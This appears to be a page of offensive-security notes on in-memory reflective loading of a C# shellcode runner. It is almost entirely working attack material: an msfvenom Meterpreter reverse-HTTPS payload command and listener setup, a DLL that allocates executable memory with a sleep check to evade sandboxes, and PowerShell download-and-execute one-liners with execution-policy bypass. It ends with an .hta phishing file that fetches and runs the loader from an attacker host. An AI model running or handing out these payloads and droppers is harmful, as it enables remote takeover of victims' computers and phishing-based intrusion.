In-Memory Reflective Load (.dll + .ps1)

VS: Class Library (.NET Framework)

load precompiled C# assembly directly into memory without touching disk and executed our shellcode runner

C# shellcode:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f csharp

use 32-bit for MS Office macro attack

listener:

sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run

shell.dll

using System;
using System.Runtime.InteropServices;

namespace ClassLibrary1
{
    public class Class1
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
          IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
        
        [DllImport("kernel32.dll")]
        static extern void Sleep(uint dwMilliseconds);
        
        public static void runner()
        {
            DateTime t1 = DateTime.Now;
            Sleep(2000);
            double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
            if(t2 < 1.5)
            {
                return;
            }
            
            byte[] buf = new byte[4] {
            0xfc,0x48,0x83,0xe4};

            // decryptor if used evasion encryptor
            //for (int i = 0; i < buf.Length; i++)
            //{
            //    buf[i] = (byte)(((uint)buf[i] - 2) & 0xFF);
            //}

            int size = buf.Length;

            IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);

            Marshal.Copy(buf, 0, addr, size);

            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);

            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}

python -m http.server 80

rev.ps1

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.119.120/ClassLibrary1.dll')

$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)

Execution on Victim:

powershell -nop -ep bypass -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/rev.ps1')"

powershell (New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/rev.ps1') | IEX

`.hta` phishing for execution

<html>
    <head>
        <script language="JScript">
            var shell = new ActiveXObject("WScript.Shell");
            var res = shell.Run("powershell iwr -uri http://192.168.119.120/rev.ps1 -outfile C:\\Temp\\rev.ps1;powershell -nop -ep bypass C:\\Temp\\rev.ps1");
        </script>
    </head>
    <body>
        <script language="JScript">
            self.close();
        </script>
    </body>
</html>

PreviousWindow Script Host Jscript.js NextHTML Smuggling: Auto Download

Last updated 1 year ago

.hta phishing for execution

`.hta` phishing for execution